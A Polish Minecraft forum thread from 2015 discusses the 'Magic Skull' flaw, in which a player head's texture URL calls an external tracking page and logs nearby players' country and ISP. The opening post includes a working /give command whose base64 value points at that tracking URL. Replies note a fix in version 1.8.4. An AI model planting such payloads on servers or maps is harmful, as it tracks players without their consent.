Skocz do zawartości


Zdjęcie

"Magiczna czaszka" Czy Minecraft staje się groźny?


  • Zaloguj się, aby dodać odpowiedź
5 odpowiedzi w tym temacie

#1 TheVoidek

TheVoidek

    Znawca

  • Użytkownik+
  • 329 postów
  • Piechacz

Napisano 17 April 2015 - 09:19

Kilka dni temu youtuber Crushed Pixel opublikował film w którym prezentuję "Magiczną czaszkę". Wspomniana czaszka jest głową gracza z wizerunkiem popularnego mema - trollface'a. Jednak to nie wszystko. Głowa ta nie jest dekoracją, tylko obserwuje gracza. Jeżeli gracz postawi taką głowę na ziemi zostaje automatycznie zarejestrowany na stronie 

By zobaczyć linki musisz się zalogować lub zarejestrować

 i jednocześnie pobierane są od niego informacje dotyczące kraju i dostawcy internetu. Jakie jeszcze dane może wykraść ten mały blok? Nie wiadomo. Crushed Pixel załączył na wyżej podanej stronie tylko niewiele informacji - jako przestrogę. Jak można się obronić przed ewentualnym atakiem hakerów? Jak na razie nie ma na to sposobu. Postawiona na ziemi magiczna czaszka nie różni się niczym od zwykłej czaszki ze skinem, a samo przebywanie w pobliżu tej czaszki przesyła dana gracza na stronę internetową. Jedyne co możemy zrobić to zgłosić ten błąd programistom z Mojang'u. Jednak zostało już to zrobione, a Mojang obiecał naprawić ten błąd ... prawie pół roku temu - nadal bez rezultatów.

 

Czy dojdzie do tego, że np.: pobierając mapkę, lub wchodząc na serwer z taką czaszką w lobby, zostaną wykradzione nasze hasła i dane osobowe? Rodzi się też kolejne pytanie bez odpowiedzi: Czy komendy zaszły za daleko?

 

Jeśli chcesz wypróbować ten błąd w zabezpieczeniach na własnej skórze, oto komenda:

/give @a skull 1 3 {display:{Name:Magic Skull},SkullOwner:{Id:37AA41A6-CF15-B6F6-568C-7C0D32FB3983,Properties:{textures:[{Value:e3RleHR1cmVzOntTS0lOOnt1cmw6Imh0dHA6Ly9jcnVzaGVkcGl4ZWwuZXUvc2t1bGwvdHJhY2tpbmdfc2t1bGwucGhwIn19fQ===}]}}}

(Należy ją wkleić do bloku poleceń, a następnie aktywować czerwonym proszkiem. Blok poleceń możesz otrzymać wpisując na chacie komendę /give @p command_block )

 

Oto oryginalny materiał wideo przedstawiający "Magiczną czaszkę":



uJnjwIB.png


craftportal

Craftserve to największy i najlepszy polski hosting serwerów Minecraft, jest solidny i tani więc go polecam

#2 TheVoidek

TheVoidek

    Znawca

  • Użytkownik+
  • 329 postów
  • Piechacz

Napisano 17 April 2015 - 10:53

@Up

Czaszka działa jeśli znajduje się w załadowanych chunkach. Zależy więc to od tego jak duży jest twój render-distance.


uJnjwIB.png


#3 Pawełek

Pawełek

    Ekspert

  • Weteran
  • 1474 postów
  • Evolveye#7100
  • Evolveye

Napisano 17 April 2015 - 15:15

Jestem za wstawieniem na główną.

(napiszę do Ranseya;x)

 

To działa na zasadzie pobierania informacji o tym skinie do czaszki i tym sposobem razem z nimi pobierają się różne ciekwe dodatki do naszego komputera tiag?



#4 zalogooJ

zalogooJ

    Old No.7

  • Weteran
  • 1279 postów

Napisano 17 April 2015 - 22:00

Ciekawy artykuł. Dla mnie główna. Brawo!
Dołączona grafika

#5 Pawełek

Pawełek

    Ekspert

  • Weteran
  • 1474 postów
  • Evolveye#7100
  • Evolveye

Napisano 17 April 2015 - 22:03

Ciekawy artykuł. Dla mnie główna. Brawo!

Już miałem gotowy wpis kiedy nagle pojawił się post konwboya o tym że 1.8.4 poprawiło tą lukę ;/

 

Ale i tak supcio.

 

// A jednak udało się mi to jakoś upchnąć ^^



#6 Gość_Nupek_*

Gość_Nupek_*
  • Gość

Napisano 18 April 2015 - 22:54

Wiadomość wygenerowana automatycznie
Temat przeniesiony z forum
InneKącik redakcyjny
do
InneKącik redakcyjnyWykorzystane